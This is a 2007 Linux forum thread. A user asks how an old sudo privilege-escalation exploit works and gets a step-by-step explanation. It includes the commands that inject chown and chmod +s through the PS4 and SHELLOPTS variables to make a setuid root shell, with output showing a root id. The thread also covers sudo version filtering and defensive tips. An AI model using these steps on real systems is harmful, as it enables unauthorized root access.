dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Thu Nov 15, 2007 6:51 pm, Post subject: please help me understand this exploit for sudo :P
hi
i need to test this exploit on my machine:
http://www.securiteam.com/exploits/6R00E00EKU.html
but i can't seem to understand what it is doing when setting the environment options SHELLOPTS and PS4.... is the x.sh script supposed to execute the commands set in those env variables??
also, i'm guessing that i'm not supposed to have write permissions on the x.sh script, otherwise it would be stupid to setenv instead of just writing the commands into the script...
i don't know much about csh, only that it's a C-like shell with similar syntax maybe....
any help here?
thnx !
timeBandit (Bodhisattva), Joined: 31 Dec 2004, Posts: 2719, Location: here, there or in transit
Posted: Thu Nov 15, 2007 7:27 pm
SHELLOPTS=xtrace turns on script tracing, equivalent to set -x in bash. The PS4 prompt string is the prompt echoed when tracing is on. Per the Bash manual:

> PS4
> The value is the prompt printed before the command line is echoed when the `-x' option is set (see section 4.3 The Set Builtin). The first character of PS4 is replicated multiple times, as necessary, to indicate multiple levels of indirection. The default is `+ '.

The same applies to csh (as evidenced by the viability of this exploit).

The exploit requires access to a user who can execute any shell script with root privileges via sudo. The x.sh script is merely an example. When tracing is on, the user's shell evaluates and echoes the PS4 prompt string before each command in the script. However, since the script is run via sudo the shell evaluates PS4 as root. Thus the attacker can inject arbitrary commands (via PS4) into the execution environment of the script, without actually modifying the script.

Following the example:

```
gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
```

The above compiles a small program that simply launches a shell, then uses the sudo exploit to give root ownership of the executable. The command in PS4 is executed immediately before the shell prints "echo Getting root!!" (because tracing is on).

```
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
```

Use the exploit again to run another command as root, this time setting the setuid bit on the executable. Now egg will run as root.

```
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
```

Run egg and hey-presto: you have a root shell.

/me sends myself a note to check sudo versions and add "set +x" to my (mercifully few) setuid-root scripts when I get home. :oops:
_________________
Plants are pithy, brooks tend to babble--I'm content to lie between them.
Super-short f.g.o checklist: Search first, strip comments, mark solved, help others.
dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Tue Nov 20, 2007 1:25 pm
that's what i thought, but doing exactly as the description says, it didn't work for me..... Why does the script call bash if we're running from CSH?? will it execute the commands in the PS4 env from csh??
when i run the x.sh with sudo, it doesn't change egg's ownership.....
dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Tue Nov 20, 2007 1:36 pm
the exploit description says vulnerable versions to be <1.6.8p10. I have 1.6.8p9..........maybe i should try an older version since they are pretty close.
Does that sound reasonable?
timeBandit (Bodhisattva), Joined: 31 Dec 2004, Posts: 2719, Location: here, there or in transit
Posted: Tue Nov 20, 2007 5:59 pm
dinsmore wrote:
> Why does the script call bash if we're running from CSH?? will it execute the commands in the PS4 env from csh??

It doesn't, I cited the Bash manual as a reference for PS4 because I had it handy. PS1-PS4 are POSIX variables AFAIK (meaning they're the same for csh and Bash).
As for why it doesn't work for you, perhaps csh was patched to close this hole? I've no idea. csh makes my head hurt. I had the same version of sudo as you but upgraded over the weekend. I can no longer reproduce the experiment.
dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Thu Nov 22, 2007 4:37 pm
ahm, then why does the x.sh example script start with
#!/bin/bash -x
??
i found my sudo to be blocking env variables such as PS4. you can see this by typing "sudo -V" as root... I edited the sudoers config file to change this, but sudo keeps the same behaviour.. :S
dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Thu Nov 22, 2007 5:16 pm
:D
i installed an older version of sudo which didn't block those variables, so, it worked niiice
tnx for the help.....
peace out! lol
##EDIT##
btw, nice ken pic ;)
timeBandit (Bodhisattva), Joined: 31 Dec 2004, Posts: 2719, Location: here, there or in transit
Posted: Fri Nov 23, 2007 4:46 pm
dinsmore wrote:
> ahm, then why does the x.sh example script start with
> #!/bin/bash -x

Because I have a large blind spot that obscured the first line of the script. :oops:
Apologies, I locked on to the use of csh in the example and didn't think it through. I told you csh makes my head hurt.
Glad I could help, and thanks for noticing CK!
dinsmore (n00b), Joined: 19 Apr 2006, Posts: 54
Posted: Mon Nov 26, 2007 3:44 pm
i was wondering.... where did you get that ken pic? i've been searching for info about ken to see if i can get it for linux, but i can't seem to find any info or pics.... (i'm assuming that pic is from the ken pc game... i used to play it for dos lol)
.. :)
timeBandit (Bodhisattva), Joined: 31 Dec 2004, Posts: 2719, Location: here, there or in transit
Posted: Mon Nov 26, 2007 6:30 pm
dinsmore wrote:
> i was wondering.... where did you get that ken pic?

I GIMPed a screen shot from the DOS game. :)